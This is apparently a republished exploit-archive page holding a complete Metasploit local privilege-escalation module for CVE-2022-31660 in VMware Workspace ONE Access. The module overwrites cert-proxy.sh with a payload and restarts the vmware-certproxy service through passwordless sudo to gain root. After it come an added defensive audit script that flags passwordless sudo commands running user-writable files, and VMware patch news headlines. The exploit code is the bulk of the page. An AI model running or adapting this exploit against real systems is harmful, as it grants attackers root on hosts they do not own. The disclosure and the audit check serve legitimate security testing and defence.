VMware Workspace ONE Access Privilege Escalation

VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password.

Packet Storm
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Unix

  TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'VMware Workspace ONE Access CVE-2022-31660',
          'Description' => %q{
            VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges
            to those of the root user by modifying a file and then restarting the vmware-certproxy service which
            invokes it. The service control is permitted via the sudo configuration without a password.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Spencer McIntyre'
          ],
          'Platform' => [ 'linux', 'unix' ],
          'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
          'SessionTypes' => ['shell', 'meterpreter'],
          'Targets' => [
            [ 'Automatic', {} ],
          ],
          'DefaultOptions' => {
            'PrependFork' => true,
            'MeterpreterTryToFork' => true
          },
          'Privileged' => true,
          'DefaultTarget' => 0,
          'References' => [
            [ 'CVE', '2022-31660' ],
            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]
          ],
          'DisclosureDate' => '2022-08-02',
          'Notes' => {
            # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service
            # is disabled by default though.
            'Stability' => [CRASH_SERVICE_DOWN],
            'Reliability' => [REPEATABLE_SESSION],
            'SideEffects' => [ARTIFACTS_ON_DISK]
          }
        }
      )
    )
  end

  def certproxy_service
    # this script's location depends on the version, so find it.
    return @certproxy_service if @certproxy_service

    @certproxy_service = [
      '/usr/local/horizon/scripts/certproxyService.sh',
      '/opt/vmware/certproxy/bin/certproxyService.sh'
    ].find { |path| file?(path) }
    vprint_status("Found service control script at: #{@certproxy_service}") if @certproxy_service
    @certproxy_service
  end

  def sudo(arguments)
    cmd_exec("sudo --non-interactive #{arguments}")
  end

  def check
    unless whoami == 'horizon'
      return CheckCode::Safe('Not running as the horizon user.')
    end

    token = Rex::Text.rand_text_alpha(10)
    unless sudo("--list '#{certproxy_service}' && echo #{token}").include?(token)
      return CheckCode::Safe('Cannot invoke the service control script with sudo.')
    end

    unless writable?(TARGET_FILE)
      return CheckCode::Safe('Cannot write to the service file.')
    end

    CheckCode::Appears
  end

  def exploit
    # backup the original permissions and contents
    print_status('Backing up the original file...')
    @backup = {
      stat: stat(TARGET_FILE),
      contents: read_file(TARGET_FILE)
    }

    if payload.arch.first == ARCH_CMD
      payload_data = "#!/bin/bash\n#{payload.encoded}"
    else
      payload_data = generate_payload_exe
    end
    upload_and_chmodx(TARGET_FILE, payload_data)

    print_status('Triggering the payload...')
    sudo("--background #{certproxy_service} restart")
  end

  def cleanup
    return unless @backup

    print_status('Restoring file contents...')
    file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it
    write_file(TARGET_FILE, @backup[:contents])

    print_status('Restoring file permissions...')
    chmod(TARGET_FILE, @backup[:stat].mode & 0o777)
  end
end
```
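A defender-side check for the condition the module relies on, as an added example that is not part of the Packet Storm post or the Metasploit module: it lists the commands a user may run through passwordless sudo and reports any that are, or that reference, a file the same user can modify. The sudoers rule, script body, uid and file modes below are constructed; only the two file paths are taken from the module.

```ruby
# Added audit sketch (not from the Metasploit module): flag NOPASSWD sudo
# commands whose script, or any absolute path it references, is modifiable
# by the unprivileged user allowed to run it.
Meta = Struct.new(:uid, :gid, :mode) # minimal stand-in for File::Stat

# Commands `user` may run without a password (simple one-line rules only).
def nopasswd_commands(sudoers_text, user)
  rule = /\A(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?NOPASSWD:\s*(.+)\z/
  sudoers_text.each_line.flat_map do |line|
    m = line.sub(/#.*/, '').strip.match(rule)
    next [] unless m && m[1] == user
    m[2].split(',').map { |c| c.strip.split.first }
  end
end

# The owner can always chmod; otherwise group bits apply before "other" bits.
def writable_by?(meta, uid, gids)
  return true if meta.uid == uid
  return (meta.mode & 0o020) != 0 if gids.include?(meta.gid)
  (meta.mode & 0o002) != 0
end

# read/stat are injected so the check runs on live files or on fixtures.
def risky_sudo_targets(sudoers_text, user, uid, gids, read:, stat:)
  nopasswd_commands(sudoers_text, user).flat_map do |cmd|
    refs = read.call(cmd).to_s.scan(%r{(?<![\w.])/[\w./-]+})
    ([cmd] + refs).uniq.select do |path|
      # A writable parent directory lets the file be replaced outright.
      [path, File.dirname(path)].any? do |p|
        (meta = stat.call(p)) && writable_by?(meta, uid, gids)
      end
    end.map { |path| { sudo_command: cmd, modifiable: path } }
  end
end

# Constructed fixture: the sudoers rule, script body, owners and modes are
# assumptions for illustration; only the two paths come from the module.
SERVICE = '/opt/vmware/certproxy/bin/certproxyService.sh'
TARGET  = '/opt/vmware/certproxy/bin/cert-proxy.sh'
SUDOERS = "horizon ALL = NOPASSWD: #{SERVICE}\n"
BODIES  = { SERVICE => "#!/bin/sh\nexec #{TARGET} \"$1\"\n" }
STATS   = {
  SERVICE => Meta.new(0, 0, 0o755),
  TARGET => Meta.new(1001, 1001, 0o750), # owned by horizon (uid assumed)
  File.dirname(TARGET) => Meta.new(0, 0, 0o755)
}
FINDINGS = risky_sudo_targets(SUDOERS, 'horizon', 1001, [1001],
                              read: BODIES.method(:[]), stat: STATS.method(:[]))
FINDINGS.each { |f| puts "#{f[:sudo_command]} runs user-modifiable #{f[:modifiable]}" }
```

On a live host the `read:` and `stat:` arguments can be lambdas wrapping `File.read` and `File.stat` that return nil for missing paths.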

Related news

CVE-2022-31658: VMSA-2022-0021

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution.

VMWare Urges Users to Patch Critical Authentication Bypass Bug

Vulnerability—for which a proof-of-concept is forthcoming—is one of a string of flaws the company fixed that could lead to an attack chain.

Update now! VMWare patches critical vulnerabilities in several products

In a critical security advisory, VMWare patches multiple RCE and EoP vulnerabilities in several affected products. The post Update now! VMWare patches critical vulnerabilities in several products appeared first on Malwarebytes Labs.

VMware Releases Patches for Several New Flaws Affecting Multiple Products

Virtualization services provider VMware on Tuesday shipped updates to address 10 security flaws affecting multiple products that could be abused by unauthenticated attackers to perform malicious actions. The issues tracked from CVE-2022-31656 through CVE-2022-31665 (CVSS scores: 4.7 - 9.8) affect the VMware Workspace ONE Access, Workspace ONE Access Connector, Identity Manager, Identity Manager
